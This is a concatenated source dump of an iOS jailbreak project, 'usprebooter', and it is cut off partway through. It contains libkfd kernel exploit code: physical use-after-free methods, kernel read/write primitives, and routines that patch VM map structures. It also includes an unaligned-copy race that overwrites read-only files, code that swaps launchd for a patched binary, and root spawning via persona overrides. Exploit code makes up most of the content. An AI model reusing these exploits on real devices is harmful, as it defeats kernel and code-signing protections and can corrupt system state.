kget_u64(vm_map_entry__links__prev, entry_kaddr); leaked_entry_next = entry_next; leaked_entry_end = entry_end; assert(leaked_entry_end == smith->vme[3].address); } entry_kaddr = entry_next; } /* * Patch the doubly-linked list. * * We leak "vme2b" from the doubly-linked list, as explained in the write-up. */ kset_u64(vm_map_entry__links__next, leaked_entry_next, leaked_entry_prev); kset_u64(vm_map_entry__links__prev, leaked_entry_prev, leaked_entry_next); /* * Patch "vme2->vme_end". * * The kwrite() call is just a workaround if the kwrite primitive cannot * overwrite 0. Otherwise, the first 4 lines can be omitted. */ u64 vme_end0_start_and_next[2] = { vme_end0_start, (-1) }; u64 unaligned_kaddr = vme_end0_kaddr + kfd_offset(vm_map_entry__links__start) + 1; u64 unaligned_uaddr = (u64)(&vme_end0_start_and_next) + 1; kwrite((u64)(kfd), (void*)(unaligned_uaddr), unaligned_kaddr, sizeof(u64)); kset_u64(vm_map_entry__links__end, leaked_entry_end, vme_end0_kaddr); /* * Patch the red-black tree. * * We leak "vme2b" from the red-black tree, as explained in the write-up. */ kset_u64(vm_map_entry__store__entry__rbe_parent, leaked_entry_parent_store, vme_for_store(leaked_entry_right_store)); kset_u64(vm_map_entry__store__entry__rbe_left, leaked_entry_right_store, vme_for_store(leaked_entry_parent_store)); /* * Patch map->hdr.nentries. * * I believe this is not strictly necessary to prevent a kernel panic * when the process exits, but I like to patch it just in case. */ u64 nentries_buffer = kget_u64(_vm_map__hdr__nentries, map_kaddr); i32 old_nentries = *(i32*)(&nentries_buffer); print_u32(old_nentries); *(i32*)(&nentries_buffer) = (old_nentries - 1); kset_u64(_vm_map__hdr__nentries, nentries_buffer, map_kaddr); /* * Patch map->hint. * * We set map->hint to point to vm_map_to_entry(map), which effectively * means there is no valid hint. */ kset_u64(_vm_map__hint, map_entry_kaddr, map_kaddr); } while (0); do { /* * Scan hole list: we use the kread primitive to loop through every hole * entry in our VM map's hole list, and record the information that we * need to patch things up below. Once again, there are some assertions * along the way to make sure the state is corrupted as expected. */ u64 hole_count = 0; u64 hole_kaddr = kget_u64(_vm_map__holes_list, map_kaddr); u64 first_hole_kaddr = hole_kaddr; u64 prev_hole_end = 0; u64 first_leaked_hole_prev = 0; u64 first_leaked_hole_next = 0; u64 first_leaked_hole_end = 0; u64 second_leaked_hole_prev = 0; u64 second_leaked_hole_next = 0; while (true) { hole_count++; u64 hole_next = kget_u64(vm_map_entry__links__next, hole_kaddr); u64 hole_start = kget_u64(vm_map_entry__links__start, hole_kaddr); u64 hole_end = kget_u64(vm_map_entry__links__end, hole_kaddr); if (hole_start == 0) { first_leaked_hole_prev = kget_u64(vm_map_entry__links__prev, hole_kaddr); first_leaked_hole_next = hole_next; first_leaked_hole_end = hole_end; assert(prev_hole_end == smith->vme[1].address); } else if (hole_start == smith->vme[1].address) { second_leaked_hole_prev = kget_u64(vm_map_entry__links__prev, hole_kaddr); second_leaked_hole_next = hole_next; assert(hole_end == smith->vme[2].address); } hole_kaddr = hole_next; prev_hole_end = hole_end; if (hole_kaddr == first_hole_kaddr) { break; } } /* * Patch the hole entries. * * We patch the end address of the first hole and we leak the two extra * holes, as explained in the write-up. */ kset_u64(vm_map_entry__links__end, first_leaked_hole_end, first_leaked_hole_prev); kset_u64(vm_map_entry__links__next, first_leaked_hole_next, first_leaked_hole_prev); kset_u64(vm_map_entry__links__prev, first_leaked_hole_prev, first_leaked_hole_next); kset_u64(vm_map_entry__links__next, second_leaked_hole_next, second_leaked_hole_prev); kset_u64(vm_map_entry__links__prev, second_leaked_hole_prev, second_leaked_hole_next); /* * Patch map->hole_hint. * * We set map->hole_hint to point to the first hole, which is guaranteed * to not be one of the two holes that we just leaked. */ kset_u64(_vm_map__hole_hint, first_hole_kaddr, map_kaddr); } while (0); if (take_vm_map_lock) { /* * Restore the entry to have its right child point to its original value. */ u64 entry_kaddr = atomic_load(&smith->cleanup_vme.kaddr); u64 entry_right = atomic_load(&smith->cleanup_vme.right); kset_u64(vm_map_entry__store__entry__rbe_right, entry_right, entry_kaddr); assert_bsd(pthread_join(smith->cleanup_vme.pthread, NULL)); } } #endif /* smith_h */ ================================================ FILE: usprebooter/libkfd/puaf.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef puaf_h #define puaf_h // Forward declarations for helper functions. void puaf_helper_get_vm_map_first_and_last(u64* first_out, u64* last_out); void puaf_helper_get_vm_map_min_and_max(u64* min_out, u64* max_out); void puaf_helper_give_ppl_pages(void); #include "puaf/landa.h" #include "puaf/physpuppet.h" #include "puaf/smith.h" #define puaf_method_case(method) \ case puaf_##method: { \ const char* method_name = #method; \ print_string(method_name); \ kfd->puaf.puaf_method_ops.init = method##_init; \ kfd->puaf.puaf_method_ops.run = method##_run; \ kfd->puaf.puaf_method_ops.cleanup = method##_cleanup; \ kfd->puaf.puaf_method_ops.free = method##_free; \ break; \ } void puaf_init(struct kfd* kfd, u64 puaf_pages, u64 puaf_method) { kfd->puaf.number_of_puaf_pages = puaf_pages; kfd->puaf.puaf_pages_uaddr = (u64*)(malloc_bzero(kfd->puaf.number_of_puaf_pages * sizeof(u64))); switch (puaf_method) { puaf_method_case(landa) puaf_method_case(physpuppet) puaf_method_case(smith) } kfd->puaf.puaf_method_ops.init(kfd); } void puaf_run(struct kfd* kfd) { puaf_helper_give_ppl_pages(); timer_start(); kfd->puaf.puaf_method_ops.run(kfd); timer_end(); } void puaf_cleanup(struct kfd* kfd) { timer_start(); kfd->puaf.puaf_method_ops.cleanup(kfd); timer_end(); } void puaf_free(struct kfd* kfd) { kfd->puaf.puaf_method_ops.free(kfd); bzero_free(kfd->puaf.puaf_pages_uaddr, kfd->puaf.number_of_puaf_pages * sizeof(u64)); if (kfd->puaf.puaf_method_data) { bzero_free(kfd->puaf.puaf_method_data, kfd->puaf.puaf_method_data_size); } } /* * Helper puaf functions. */ void puaf_helper_get_vm_map_first_and_last(u64* first_out, u64* last_out) { u64 first_address = 0; u64 last_address = 0; vm_address_t address = 0; vm_size_t size = 0; vm_region_basic_info_data_64_t data = {}; vm_region_info_t info = (vm_region_info_t)(&data); mach_msg_type_number_t count = VM_REGION_BASIC_INFO_COUNT_64; mach_port_t port = MACH_PORT_NULL; while (true) { kern_return_t kret = vm_region_64(mach_task_self(), &address, &size, VM_REGION_BASIC_INFO_64, info, &count, &port); if (kret == KERN_INVALID_ADDRESS) { last_address = address; break; } assert(kret == KERN_SUCCESS); if (!first_address) { first_address = address; } address += size; size = 0; } *first_out = first_address; *last_out = last_address; } void puaf_helper_get_vm_map_min_and_max(u64* min_out, u64* max_out) { task_vm_info_data_t data = {}; task_info_t info = (task_info_t)(&data); mach_msg_type_number_t count = TASK_VM_INFO_COUNT; assert_mach(task_info(mach_task_self(), TASK_VM_INFO, info, &count)); *min_out = data.min_address; *max_out = data.max_address; } void puaf_helper_give_ppl_pages(void) { timer_start(); const u64 given_ppl_pages_max = 10000; const u64 l2_block_size = (1ull << 25); vm_address_t addresses[given_ppl_pages_max] = {}; vm_address_t address = 0; u64 given_ppl_pages = 0; u64 min_address, max_address; puaf_helper_get_vm_map_min_and_max(&min_address, &max_address); while (true) { address += l2_block_size; if (address < min_address) { continue; } if (address >= max_address) { break; } kern_return_t kret = vm_allocate(mach_task_self(), &address, pages(1), VM_FLAGS_FIXED); if (kret == KERN_SUCCESS) { memset((void*)(address), 'A', 1); addresses[given_ppl_pages] = address; if (++given_ppl_pages == given_ppl_pages_max) { break; } } } for (u64 i = 0; i < given_ppl_pages; i++) { assert_mach(vm_deallocate(mach_task_self(), addresses[i], pages(1))); } print_u64(given_ppl_pages); timer_end(); } #endif /* puaf_h */ ================================================ FILE: usprebooter/libkfd.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef libkfd_h #define libkfd_h /* * The global configuration parameters of libkfd. */ #define CONFIG_ASSERT 1 #define CONFIG_PRINT 1 #define CONFIG_TIMER 1 #include "libkfd/common.h" #include "fun.h" /* * The public API of libkfd. */ enum puaf_method { puaf_physpuppet, puaf_smith, puaf_landa, }; enum kread_method { kread_kqueue_workloop_ctl, kread_sem_open, }; enum kwrite_method { kwrite_dup, kwrite_sem_open, }; u64 kopen(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method); void kread(u64 kfd, u64 kaddr, void* uaddr, u64 size); void kwrite(u64 kfd, void* uaddr, u64 kaddr, u64 size); void kclose(u64 kfd); /* * The private API of libkfd. */ struct kfd; // Forward declaration for function pointers. struct info { struct { vm_address_t src_uaddr; vm_address_t dst_uaddr; vm_size_t size; } copy; struct { i32 pid; u64 tid; u64 vid; u64 maxfilesperproc; char kern_version[512]; char build_version[512]; // Add this line char device_id[512]; } env; struct { u64 current_map; u64 current_pmap; u64 current_proc; u64 current_task; u64 kernel_map; u64 kernel_pmap; u64 kernel_proc; u64 kernel_task; } kaddr; }; struct perf { u64 kernel_slide; u64 gVirtBase; u64 gPhysBase; u64 gPhysSize; struct { u64 pa; u64 va; } ttbr[2]; struct ptov_table_entry { u64 pa; u64 va; u64 len; } ptov_table[8]; struct { u64 kaddr; u64 paddr; u64 uaddr; u64 size; } shared_page; struct { i32 fd; u32 si_rdev_buffer[2]; u64 si_rdev_kaddr; } dev; void (*saved_kread)(struct kfd*, u64, void*, u64); void (*saved_kwrite)(struct kfd*, void*, u64, u64); }; struct puaf { u64 number_of_puaf_pages; u64* puaf_pages_uaddr; void* puaf_method_data; u64 puaf_method_data_size; struct { void (*init)(struct kfd*); void (*run)(struct kfd*); void (*cleanup)(struct kfd*); void (*free)(struct kfd*); } puaf_method_ops; }; struct krkw { u64 krkw_maximum_id; u64 krkw_allocated_id; u64 krkw_searched_id; u64 krkw_object_id; u64 krkw_object_uaddr; u64 krkw_object_size; void* krkw_method_data; u64 krkw_method_data_size; struct { void (*init)(struct kfd*); void (*allocate)(struct kfd*, u64); bool (*search)(struct kfd*, u64); void (*kread)(struct kfd*, u64, void*, u64); void (*kwrite)(struct kfd*, void*, u64, u64); void (*find_proc)(struct kfd*); void (*deallocate)(struct kfd*, u64); void (*free)(struct kfd*); } krkw_method_ops; }; struct kfd { struct info info; struct perf perf; struct puaf puaf; struct krkw kread; struct krkw kwrite; }; #include "libkfd/info.h" #include "libkfd/puaf.h" #include "libkfd/krkw.h" #include "libkfd/perf.h" struct kfd* kfd_init(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method) { struct kfd* kfd = (struct kfd*)(malloc_bzero(sizeof(struct kfd))); info_init(kfd); puaf_init(kfd, puaf_pages, puaf_method); krkw_init(kfd, kread_method, kwrite_method); perf_init(kfd); return kfd; } void kfd_free(struct kfd* kfd) { perf_free(kfd); krkw_free(kfd); puaf_free(kfd); info_free(kfd); bzero_free(kfd, sizeof(struct kfd)); } u64 kopen(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method) { // timer_start(); const u64 puaf_pages_min = 16; const u64 puaf_pages_max = 4096; assert(puaf_pages >= puaf_pages_min); assert(puaf_pages <= puaf_pages_max); assert(puaf_method <= puaf_landa); assert(kread_method <= kread_sem_open); assert(kwrite_method <= kwrite_sem_open); struct kfd* kfd = kfd_init(puaf_pages, puaf_method, kread_method, kwrite_method); puaf_run(kfd); krkw_run(kfd); info_run(kfd); perf_run(kfd); puaf_cleanup(kfd); // timer_end(); return (u64)(kfd); } void kread(u64 kfd, u64 kaddr, void* uaddr, u64 size) { krkw_kread((struct kfd*)(kfd), kaddr, uaddr, size); } void kwrite(u64 kfd, void* uaddr, u64 kaddr, u64 size) { krkw_kwrite((struct kfd*)(kfd), uaddr, kaddr, size); } void kclose(u64 kfd) { kfd_free((struct kfd*)(kfd)); } #endif /* libkfd_h */ ================================================ FILE: usprebooter/memoryControl.h ================================================ // // memoryControl.h // PureKFD // // Created by Nick Chan on 10/12/2023. // #ifndef memoryControl_h #define memoryControl_h #include #include #include #include #include #define MEMORYSTATUS_CMD_SET_JETSAM_TASK_LIMIT 6 #define MEMORYSTATUS_CMD_GET_MEMLIMIT_PROPERTIES 8 typedef struct CF_BRIDGED_TYPE(id) __SecTask *SecTaskRef; SecTaskRef SecTaskCreateFromSelf(CFAllocatorRef _Nullable allocator); CFTypeRef SecTaskCopyValueForEntitlement(SecTaskRef task, CFStringRef entitlement, CFErrorRef *error); bool hasEntitlement(CFStringRef entitlement); int memorystatus_control(uint32_t command, int32_t pid, uint32_t flags, void *buffer, size_t buffersize); uint64_t getPhysicalMemorySize(void); typedef struct memorystatus_memlimit_properties { int32_t memlimit_active; /* jetsam memory limit (in MB) when process is active */ uint32_t memlimit_active_attr; int32_t memlimit_inactive; /* jetsam memory limit (in MB) when process is inactive */ uint32_t memlimit_inactive_attr; } memorystatus_memlimit_properties_t; typedef struct memorystatus_memlimit_properties2 { memorystatus_memlimit_properties_t v1; uint32_t memlimit_increase; /* jetsam memory limit increase (in MB) for active and inactive states */ uint32_t memlimit_increase_bytes; /* bytes used to determine the jetsam memory limit increase, for active and inactive states */ } memorystatus_memlimit_properties2_t; #endif /* memoryControl_h */ ================================================ FILE: usprebooter/memoryControl.m ================================================ // // memoryControl.m // PureKFD // // Created by Nick Chan on 10/12/2023. // #import #include "memoryControl.h" bool hasEntitlement(CFStringRef entitlement) { SecTaskRef task = SecTaskCreateFromSelf(NULL); CFTypeRef value = SecTaskCopyValueForEntitlement(task, entitlement, NULL); if (value != nil) { CFRelease(value); } CFRelease(task); return (value != NULL); } uint64_t getPhysicalMemorySize(void) { return NSProcessInfo.processInfo.physicalMemory; } ================================================ FILE: usprebooter/overwriter.h ================================================ // // overwriter.h // usprebooter // // Created by LL on 1/12/23. // #ifndef overwriter_h #define overwriter_h bool overwrite_patchedlaunchd_kfd(void); #endif /* overwriter_h */ ================================================ FILE: usprebooter/overwriter.m ================================================ @import Darwin; @import Foundation; @import MachO; #import #import "vm_unaligned_copy_switch_race.h" #import "overwriter.h" #import "troller.h" #import "fun/thanks_opa334dev_htrowii.h" #include "util.h" #import "fun/vnode.h" NSString* getLunchd(void) { return jbroot(@"lunchd"); } bool overwrite_patchedlaunchd_kfd(void) { // ayo whats this – bomberfish // SwitchSysBin(getVnodeAtPathByChdir("/System/Library/CoreServices/SpringBoard.app"), "SpringBoard", "/var/jb/SprangBoard"); printf("[i] performing launchd hax\n"); SwitchSysBin(getVnodeAtPathByChdir("/sbin"), "launchd", getLunchd().UTF8String); printf("[i] launchd haxed\n"); return true; } ================================================ FILE: usprebooter/troller.h ================================================ // // troller.h // usprebooter // // Created by LL on 29/11/23. // #ifndef troller_h #define troller_h int userspaceReboot(void); int go(void); int get_boot_manifest_hash(char hash[97]); char* return_boot_manifest_hash_main(void); #endif /* troller_h */ ================================================ FILE: usprebooter/troller.m ================================================ // // troller.c // usprebooter // // Created by LL on 29/11/23. // #include #include "troller.h" #include "xpc.h" #include "xpc_connection.h" #include "bootstrap.h" #include #include #include #include #include #include "util.h" #include #include "overwriter.h" int get_boot_manifest_hash(char hash[97]) { const UInt8 *bytes; CFIndex length; io_registry_entry_t chosen = IORegistryEntryFromPath(0, "IODeviceTree:/chosen"); if (!MACH_PORT_VALID(chosen)) return 1; CFDataRef manifestHash = (CFDataRef)IORegistryEntryCreateCFProperty(chosen, CFSTR("boot-manifest-hash"), kCFAllocatorDefault, 0); IOObjectRelease(chosen); if (manifestHash == NULL || CFGetTypeID(manifestHash) != CFDataGetTypeID()) { if (manifestHash != NULL) CFRelease(manifestHash); return 1; } length = CFDataGetLength(manifestHash); bytes = CFDataGetBytePtr(manifestHash); for (int i = 0; i < length; i++) { snprintf(&hash[i * 2], 3, "%02X", bytes[i]); } CFRelease(manifestHash); return 0; } char* return_boot_manifest_hash_main(void) { static char hash[97]; int ret = get_boot_manifest_hash(hash); if (ret != 0) { fprintf(stderr, "could not get boot manifest hash\n"); return "lmao"; } static char result[115]; sprintf(result, "/private/preboot/%s", hash); return result; } int userspaceReboot(void) { kern_return_t ret = 0; xpc_object_t xdict = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_uint64(xdict, "cmd", 5); xpc_object_t xreply; ret = unlink("/private/var/mobile/Library/MemoryMaintenance/mmaintenanced"); if (ret && errno != ENOENT) { fprintf(stderr, "could not delete mmaintenanced last reboot file\n"); return -1; } xpc_connection_t connection = xpc_connection_create_mach_service("com.apple.mmaintenanced", NULL, 0); if (xpc_get_type(connection) == XPC_TYPE_ERROR) { char* desc = xpc_copy_description((__bridge xpc_object_t _Nonnull)(xpc_get_type(connection))); puts(desc); free(desc); return -1; } xpc_connection_set_event_handler(connection, ^(xpc_object_t event) { char* desc = xpc_copy_description(event); puts(desc); free(desc); }); xpc_connection_activate(connection); char* desc = xpc_copy_description(connection); puts(desc); printf("connection created\n"); xpc_object_t reply = xpc_connection_send_message_with_reply_sync(connection, xdict); if (reply) { char* desc = xpc_copy_description(reply); puts(desc); free(desc); xpc_connection_cancel(connection); return 0; } return -1; } int go(void) { printf("[*] Hammer time.\n"); kern_return_t ret = 0; // copyLaunchd(); NSString *mainBundlePath = [[[NSBundle mainBundle] bundlePath] stringByAppendingPathComponent:@"trolltoolsroothelper"]; spawnRoot(mainBundlePath, @[@"bootstrap", @"", @""], nil, nil); overwrite_patchedlaunchd_kfd(); // codesignLaunchd(); return ret; } ================================================ FILE: usprebooter/usprebooter-Bridging-Header.h ================================================ // // Use this file to import your target's public headers that you would like to expose to Swift. // #include "troller.h" #include "util.h" #include "fun/fun.h" #include "fun/krw.h" #include "memoryControl.h" //#include "fun/helpers.h" #include void do_kclose(void); void fix_exploit(void); int go(void); int userspaceReboot(void); ================================================ FILE: usprebooter/usprebooterApp.swift ================================================ import SwiftUI @main struct usprebooterApp: App { @State var useNewUI: Bool = true init() { if !FileManager.default.fileExists(atPath: "/var/mobile/boot-happy.jp2") { if let bootlogo = Bundle.main.url(forResource: "boot-happy", withExtension: "jp2") { try? FileManager.default.copyItem(at: bootlogo, to: URL(fileURLWithPath: "/var/mobile/boot-happy.jp2")) } } if !FileManager.default.fileExists(atPath: "/var/mobile/boot-sad.jp2") { if let bootlogo = Bundle.main.url(forResource: "boot-sad", withExtension: "jp2") { try? FileManager.default.copyItem(at: bootlogo, to: URL(fileURLWithPath: "/var/mobile/boot-sad.jp2")) } } } var body: some Scene { WindowGroup { if useNewUI { CoolerContentView(useNewUI: $useNewUI) .preferredColorScheme(.dark) } else { ContentView(useNewUI: $useNewUI) } } } } ================================================ FILE: usprebooter/util.h ================================================ // // util.h // usprebooter // // Created by LL on 29/11/23. // #ifndef util_h #define util_h #import void respring(void); int spawnRoot(NSString* path, NSArray* args, NSString** stdOut, NSString** stdErr); NSString *jbroot(NSString *path); #endif /* util_h */ ================================================ FILE: usprebooter/util.m ================================================ // // util.m // usprebooter // // Created by LL on 29/11/23. // #import #import "util.h" #import #import #import NSString *getExecutablePath(void) { uint32_t len = PATH_MAX; char selfPath[len]; _NSGetExecutablePath(selfPath, &len); NSLog(@"executable path: %@", [NSString stringWithUTF8String:selfPath]); return [NSString stringWithUTF8String:selfPath]; } int fd_is_valid(int fd) { return fcntl(fd, F_GETFD) != -1 || errno != EBADF; } NSString* getNSStringFromFile(int fd) { NSMutableString* ms = [NSMutableString new]; ssize_t num_read; char c; if(!fd_is_valid(fd)) return @""; while((num_read = read(fd, &c, sizeof(c)))) { [ms appendString:[NSString stringWithFormat:@"%c", c]]; if(c == '\n') break; } return ms.copy; } void printMultilineNSString(NSString* stringToPrint) { NSCharacterSet *separator = [NSCharacterSet newlineCharacterSet]; NSArray* lines = [stringToPrint componentsSeparatedByCharactersInSet:separator]; for(NSString* line in lines) { NSLog(@"%@", line); } } #define POSIX_SPAWN_PERSONA_FLAGS_OVERRIDE 1 int posix_spawnattr_set_persona_np(const posix_spawnattr_t* __restrict, uid_t, uint32_t); int posix_spawnattr_set_persona_uid_np(const posix_spawnattr_t* __restrict, uid_t); int posix_spawnattr_set_persona_gid_np(const posix_spawnattr_t* __restrict, uid_t); int spawnRoot(NSString* path, NSArray* args, NSString** stdOut, NSString** stdErr) { NSMutableArray* argsM = args.mutableCopy ?: [NSMutableArray new]; [argsM insertObject:path.lastPathComponent atIndex:0]; NSUInteger argCount = [argsM count]; char **argsC = (char **)malloc((argCount + 1) * sizeof(char*)); for (NSUInteger i = 0; i < argCount; i++) { argsC[i] = strdup([[argsM objectAtIndex:i] UTF8String]); } argsC[argCount] = NULL; posix_spawnattr_t attr; posix_spawnattr_init(&attr); posix_spawnattr_set_persona_np(&attr, 99, POSIX_SPAWN_PERSONA_FLAGS_OVERRIDE); posix_spawnattr_set_persona_uid_np(&attr, 0); posix_spawnattr_set_persona_gid_np(&attr, 0); posix_spawn_file_actions_t action; posix_spawn_file_actions_init(&action); int outErr[2]; if(stdErr) { pipe(outErr); posix_spawn_file_actions_adddup2(&action, outErr[1], STDERR_FILENO); posix_spawn_file_actions_addclose(&action, outErr[0]); } int out[2]; if(stdOut) { pipe(out); posix_spawn_file_actions_adddup2(&action, out[1], STDOUT_FILENO); posix_spawn_file_actions_addclose(&action, out[0]); } pid_t task_pid; int status = -200; int spawnError = posix_spawn(&task_pid, [path UTF8String], &action, &attr, (char* const*)argsC, NULL); posix_spawnattr_destroy(&attr); for (NSUInteger i = 0; i < argCount; i++) { free(argsC[i]); } free(argsC); if(spawnError != 0) { NSLog(@"We down"); NSLog(@"posix_spawn error %d\n", spawnError); return spawnError; } do { pid_t waitpids = waitpid(task_pid, &status, 0); if (waitpids != -1) { NSLog(@"Child status %d", WEXITSTATUS(status)); } else { // perror("waitpid"); // NSLog(@"waitpid returned %@", waitpids); return -222; } } while (!WIFEXITED(status) && !WIFSIGNALED(status)); if(stdOut) { close(out[1]); NSString* output = getNSStringFromFile(out[0]); *stdOut = output; } if(stdErr) { close(outErr[1]); NSString* errorOutput = getNSStringFromFile(outErr[0]); *stdErr = errorOutput; } // NSLog(@"%@", status); return WEXITSTATUS(status); } void enumerateProcessesUsingBlock(void (^enumerator)(pid_t pid, NSString* executablePath, BOOL* stop)) { static int maxArgumentSize = 0; if (maxArgumentSize == 0) { size_t size = sizeof(maxArgumentSize); if (sysctl((int[]){ CTL_KERN, KERN_ARGMAX }, 2, &maxArgumentSize, &size, NULL, 0) == -1) { perror("sysctl argument size"); maxArgumentSize = 4096; // Default } } int mib[3] = { CTL_KERN, KERN_PROC, KERN_PROC_ALL}; struct kinfo_proc *info; size_t length; uint64_t count; if (sysctl(mib, 3, NULL, &length, NULL, 0) < 0) return; if (!(info = malloc(length))) return; if (sysctl(mib, 3, info, &length, NULL, 0) < 0) { free(info); return; } count = length / sizeof(struct kinfo_proc); for (int i = 0; i < count; i++) { @autoreleasepool { pid_t pid = info[i].kp_proc.p_pid; if (pid == 0) { continue; } size_t size = maxArgumentSize; char* buffer = (char *)malloc(length); if (sysctl((int[]){ CTL_KERN, KERN_PROCARGS2, pid }, 3, buffer, &size, NULL, 0) == 0) { NSString* executablePath = [NSString stringWithCString:(buffer+sizeof(int)) encoding:NSUTF8StringEncoding]; BOOL stop = NO; enumerator(pid, executablePath, &stop); if(stop) { free(buffer); break; } } free(buffer); } } free(info); } void killall(NSString* processName, BOOL softly) { enumerateProcessesUsingBlock(^(pid_t pid, NSString* executablePath, BOOL* stop) { if([executablePath.lastPathComponent isEqualToString:processName]) { if(softly) { kill(pid, SIGTERM); } else { kill(pid, SIGKILL); } } }); } void respring(void) { killall(@"SpringBoard", YES); exit(0); } #define JB_ROOT_PREFIX ".jbroot-" #define JB_RAND_LENGTH (sizeof(uint64_t)*sizeof(char)*2) int is_jbrand_value(uint64_t value) { uint8_t check = value>>8 ^ value >> 16 ^ value>>24 ^ value>>32 ^ value>>40 ^ value>>48 ^ value>>56; return check == (uint8_t)value; } int is_jbroot_name(const char* name) { if(strlen(name) != (sizeof(JB_ROOT_PREFIX)-1+JB_RAND_LENGTH)) return 0; if(strncmp(name, JB_ROOT_PREFIX, sizeof(JB_ROOT_PREFIX)-1) != 0) return 0; char* endp=NULL; uint64_t value = strtoull(name+sizeof(JB_ROOT_PREFIX)-1, &endp, 16); if(!endp || *endp!='\0') return 0; if(!is_jbrand_value(value)) return 0; return 1; } uint64_t resolve_jbrand_value(const char* name) { if(strlen(name) != (sizeof(JB_ROOT_PREFIX)-1+JB_RAND_LENGTH)) return 0; if(strncmp(name, JB_ROOT_PREFIX, sizeof(JB_ROOT_PREFIX)-1) != 0) return 0; char* endp=NULL; uint64_t value = strtoull(name+sizeof(JB_ROOT_PREFIX)-1, &endp, 16); if(!endp || *endp!='\0') return 0; if(!is_jbrand_value(value)) return 0; return value; } NSString* find_jbroot() { //jbroot path may change when re-randomize it NSString * jbroot = nil; NSArray *subItems = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:@"/var/containers/Bundle/Application/" error:nil]; for (NSString *subItem in subItems) { if (is_jbroot_name(subItem.UTF8String)) { NSString* path = [@"/var/containers/Bundle/Application/" stringByAppendingPathComponent:subItem]; jbroot = path; break; } } return jbroot; } NSString *jbroot(NSString *path) { NSString* jbroot = find_jbroot(); return [jbroot stringByAppendingPathComponent:path]; } ================================================ FILE: usprebooter/vm_unaligned_copy_switch_race.c ================================================ // from https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c // modified to compile outside of XNU #include #include #include #include #include #include #include #include #include "vm_unaligned_copy_switch_race.h" #define T_QUIET #define T_EXPECT_MACH_SUCCESS(a, b) #define T_EXPECT_MACH_ERROR(a, b, c) #define T_ASSERT_MACH_SUCCESS(a, b, ...) #define T_ASSERT_MACH_ERROR(a, b, c) #define T_ASSERT_POSIX_SUCCESS(a, b) #define T_ASSERT_EQ(a, b, c) do{if ((a) != (b)) { fprintf(stderr, c "\n"); exit(1); }}while(0) #define T_ASSERT_NE(a, b, c) do{if ((a) == (b)) { fprintf(stderr, c "\n"); exit(1); }}while(0) #define T_ASSERT_TRUE(a, b, ...) #define T_LOG(a, ...) fprintf(stderr, a "\n", __VA_ARGS__) #define T_DECL(a, b) static void a(void) #define T_PASS(a, ...) fprintf(stderr, a "\n", __VA_ARGS__) struct context1 { vm_size_t obj_size; vm_address_t e0; mach_port_t mem_entry_ro; mach_port_t mem_entry_rw; dispatch_semaphore_t running_sem; pthread_mutex_t mtx; volatile bool done; }; static void * switcheroo_thread(__unused void *arg) { kern_return_t kr; struct context1 *ctx; ctx = (struct context1 *)arg; /* tell main thread we're ready to run */ dispatch_semaphore_signal(ctx->running_sem); while (!ctx->done) { /* wait for main thread to be done setting things up */ pthread_mutex_lock(&ctx->mtx); if (ctx->done) { pthread_mutex_unlock(&ctx->mtx); break; } /* switch e0 to RW mapping */ kr = vm_map(mach_task_self(), &ctx->e0, ctx->obj_size, 0, /* mask */ VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, ctx->mem_entry_rw, 0, FALSE, /* copy */ VM_PROT_READ | VM_PROT_WRITE, VM_PROT_READ | VM_PROT_WRITE, VM_INHERIT_DEFAULT); T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() RW"); /* wait a little bit */ usleep(100); /* switch bakc to original RO mapping */ kr = vm_map(mach_task_self(), &ctx->e0, ctx->obj_size, 0, /* mask */ VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, ctx->mem_entry_ro, 0, FALSE, /* copy */ VM_PROT_READ, VM_PROT_READ, VM_INHERIT_DEFAULT); T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() RO"); /* tell main thread we're don switching mappings */ pthread_mutex_unlock(&ctx->mtx); usleep(100); } return NULL; } bool unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd) { bool retval = false; pthread_t th = NULL; int ret; kern_return_t kr; time_t start, duration; #if 0 mach_msg_type_number_t cow_read_size; #endif vm_size_t copied_size; int loops; vm_address_t e2, e5; struct context1 context1, *ctx; int kern_success = 0, kern_protection_failure = 0, kern_other = 0; vm_address_t ro_addr, tmp_addr; memory_object_size_t mo_size; ctx = &context1; ctx->obj_size = 256 * 1024; void* file_mapped = mmap(NULL, ctx->obj_size, PROT_READ, MAP_SHARED, file_to_overwrite, file_offset); if (file_mapped == MAP_FAILED) { fprintf(stderr, "failed to map\n"); return false; } if (!memcmp(file_mapped, overwrite_data, overwrite_length)) { // fprintf(stderr, "already the same?\n"); munmap(file_mapped, ctx->obj_size); return true; } ro_addr = (vm_address_t)file_mapped; ctx->e0 = 0; ctx->running_sem = dispatch_semaphore_create(0); T_QUIET; T_ASSERT_NE(ctx->running_sem, NULL, "dispatch_semaphore_create"); ret = pthread_mutex_init(&ctx->mtx, NULL); T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_mutex_init"); ctx->done = false; ctx->mem_entry_rw = MACH_PORT_NULL; ctx->mem_entry_ro = MACH_PORT_NULL; #if 0 /* allocate our attack target memory */ kr = vm_allocate(mach_task_self(), &ro_addr, ctx->obj_size, VM_FLAGS_ANYWHERE); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate ro_addr"); /* initialize to 'A' */ memset((char *)ro_addr, 'A', ctx->obj_size); #endif /* make it read-only */ kr = vm_protect(mach_task_self(), ro_addr, ctx->obj_size, TRUE, /* set_maximum */ VM_PROT_READ); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_protect ro_addr"); /* make sure we can't get read-write handle on that target memory */ mo_size = ctx->obj_size; kr = mach_make_memory_entry_64(mach_task_self(), &mo_size, ro_addr, MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE, &ctx->mem_entry_ro, MACH_PORT_NULL); T_QUIET; T_ASSERT_MACH_ERROR(kr, KERN_PROTECTION_FAILURE, 